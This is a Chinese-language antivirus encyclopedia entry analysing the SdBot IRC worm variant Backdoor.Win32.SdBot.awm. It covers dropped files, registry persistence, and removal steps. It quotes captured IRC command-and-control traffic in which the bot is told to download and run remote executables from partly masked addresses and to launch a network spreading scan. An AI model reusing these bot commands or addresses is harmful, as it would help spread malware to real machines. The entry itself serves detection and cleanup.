Backdoor.Win32.SdBot.awm

該病毒運行後,衍生病毒檔案到系統程式目錄下。添加註冊表自動運行項與系統服務項以實現隨機引導病毒體。創建大量執行緒用於掃描用戶所在網路,若發現存在默認共享或弱口令則傳播自身。此病毒為一個利用 Windows 平台下 IRC 協定的網路蠕蟲,受感染用戶可能會被操縱進行 Ddos 攻擊、遠程控制、傳送垃圾郵件、創建本地 Tftp 、 FTP 等行為。

概述

病毒名稱: Backdoor.Win32.SdBot.awm

中文名稱: recsl機器人

病毒類型: 後門類

檔案 MD5: 2001D19F828FCE890562DDDB05D68797

公開範圍: 完全公開

危害等級: 5

檔案長度: 加殼後 76,583 位元組,脫殼後518,656 位元組

感染系統: WinNT4以上系統

開發工具: Microsoft Visual C++ 6.0

加殼類型 : PECompact變形殼

命名對照: AVG[Trojan horse IRC/BackDoor.SdBot2.SEB]

F-Prot[W32/Backdoor.AFUX]

McAfee [W32/Sdbot.worm.gen.l]

行為分析

衍生

1 、衍生下列副本與檔案:

%Temporary Internet Files%\1.exe

%Temporary Internet Files%\d.exe

%System32%\1.exe

%System32%\dl.exe

%System32%\helpersysem.exe  Trojan-Proxy.Win32.Slaper.e

%System32%\mysvcc.exe   Backdoor.Win32.SdBot.awm

%System32%\sysem.exe  Backdoor.Win32.IRCBot.aak

註冊表

2 、新建註冊表鍵值:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\sysms

Value: String: "C:\WINDOWS\System32\1.exe"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msvccc66

Value: String: "dl.exe"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\mysvcig38

Value: String: "mysvcc.exe"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sysms

Value: String: "C:\WINDOWS\System32\1.exe"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\

msvccc66  Value: String: "dl.exe"

mysvcig38    Value: String: "mysvcc.exe"

3 、修改註冊表鍵值用以標記已感染:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole\EnableDCOM

New: String: "N"

Old: String: "Y"

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\restrictanonymous

New: DWORD: 1 (0x1)

Old: DWORD: 0 (0)

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\restrictanonymous

New: DWORD: 1 (0x1)

Old: DWORD: 0 (0)

連線

4 、連線的 IRC 伺服器包括下列:

TCP->Server:66.1*9.*5.1*2:18080

TCP->Server:81.9*.1*8.2*4:16666

TCP->Server:209.1*0.*2.1*0:24104

5 、連線後的操作如下,包括從指定伺服器下載並運行檔案、對本地網路進行掃描檔案已分享資料夾等:

TCP->Server:66.1*9.*5.1*2:18080 :

NICK CHN|

USER fbwwty 0 0 :CHN|

:NEWSLbb 001 CHN| :MySQL CHN|[email protected]*1.7.2*3

:NEWSLbb 376 CHN| :

:CHN| MODE CHN| :+i

USERHOST CHN|

:NEWSLbb 302 CHN| :CHN|[email protected]*1.7.2*3

MODE CHN|+x+i

JOIN ##sl,##sl2 he 爃 e

:CHN|[email protected] JOIN :##sl

:NEWSLbb 332 CHN|##sl :. 燿 http://72.2*.1.2*0/d.exe dl.exe 1

:NEWSLbb 333 CHN|##sl 10:30 PM 1175724995

:NEWSLbb 366 CHN| ##sl :End of /NAMES list.

:CHN|!~fbwwty@2*2.1*1.7.213 JOIN :##sl2

:NEWSLbb 332 CHN| ##sl2 :. 燿 http://72.2*.4.1*6/1.exe 1.exe 1

:NEWSLbb 333 CHN|##sl2 10:30 PM 1175372145

:NEWSLbb 366 CHN| ##sl2 :End of /NAMES list.

PRIVMSG ##sl :[DOWNLOAD]: Downloading

URL: http://72.*0.1.2*0/d.exe to: dl.exe.

PRIVMSG ##sl2 :[DOWNLOAD]: Downloading

URL: http://72.20.4.126/1.exe to: 1.exe.

PRIVMSG ##sl :[DOWNLOAD]: Downloaded 62.0 KB to dl.exe @ 31.0 KB/sec.

PRIVMSG ##sl :[DOWNLOAD]: Opened: dl.exe.

PRIVMSG ##sl :[DOWNLOAD]: Opened: dl.exe.

PRIVMSG ##sl2 :[DOWNLOAD]: Downloaded 71.2 KB to 1.exe @ 7.1 KB/sec.

PRIVMSG ##sl2 :[DOWNLOAD]: Opened: 1.exe.

TCP->Server:81.9*.1*8.234:16666

NICK CHN|

USER tjyqnod 0 0 :CHN|

:MySQL 001 CHN| :MySQL CHN|!~tjyqnod@2*2.1*1.7.213

:MySQL 376 CHN| :

:CHN| MODE CHN| :+i

USERHOST CHN|

:MySQL 302 CHN| :CHN|=+~tjyqnod@2*2.1*1.7.213

MODE CHN| +x+i

JOIN ##last,##last2 fe 爁 e

:CHN|!~tjyqnod@2*2.1*1.7.213 JOIN :##last

:MySQL 332 CHN| ##last :.advscan asn1smb 50 5 0 -r

:MySQL 333 CHN| ##last 10:30 PM 1175586546

:MySQL 366 CHN| ##last :End of /NAMES list.

:CHN|!~tjyqnod@2*2.1*1.7.213 JOIN :##last2

:MySQL 366 CHN| ##last2 :End of /NAMES list.

PRIVMSG ##last :[SCAN]: Random Port Scan started on 10.0.x.x:445

with a delay of 5 seconds for 0 minutes using 50 threads.

註: % System% 是一個可變路徑。病毒通過查詢作業系統來決定當前 System 資料夾的位置。 Windows2000/NT 中默認的安裝路徑是 C:\Winnt\System32 , windows95/98/me 中默認的安裝路徑是 C:\Windows\System , windowsXP 中默認的安裝路徑是 C:\Windows\System32 。

--------------------------------------------------------------------------------

清除方案

1 、 使用安天木馬防線可徹底清除此病毒 ( 推薦 )

2 、 手工清除請按照行為分析刪除對應檔案,恢復相關係統設定。

(1) 使用安天木馬防線結束病毒進程:

1.exe

dl.exe

mysvcc.exe

(2) 病毒添加的註冊表項:

HKEY_CURRENT_USER\Software\Microsoft\Windows\

CurrentVersion\Run\sysms

Value: String: "C:\WINDOWS\System32\1.exe"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\

CurrentVersion\Run\msvccc66

Value: String: "dl.exe"

CurrentVersion\Run\mysvcig38

Value: String: "mysvcc.exe"

CurrentVersion\Run\sysms

Value: String: C:\WINDOWS\System32\1.exe"

CurrentVersion\RunServices\msvccc66

Value: String: "dl.exe"

CurrentVersion\RunServices\mysvcig38

Value: String: "mysvcc.exe"

(3) 恢復註冊表下列鍵值為舊值:

New: String: "N"

Old: String: "Y"

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\

restrictanonymous

New: DWORD: 1 (0x1)

Old: DWORD: 0 (0)

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\

restrictanonymous

New: DWORD: 1 (0x1)

Old: DWORD: 0 (0)

(4) 刪除病毒釋放檔案:

%Temporary Internet Files%\1.exe

%Temporary Internet Files%\d.exe

%System32%\1.exe

%System32%\dl.exe

%System32%\helpersysem.exe

%System32%\mysvcc.exe

%System32%\sysem.exe

相關詞條

相關搜尋

熱門詞條

聯絡我們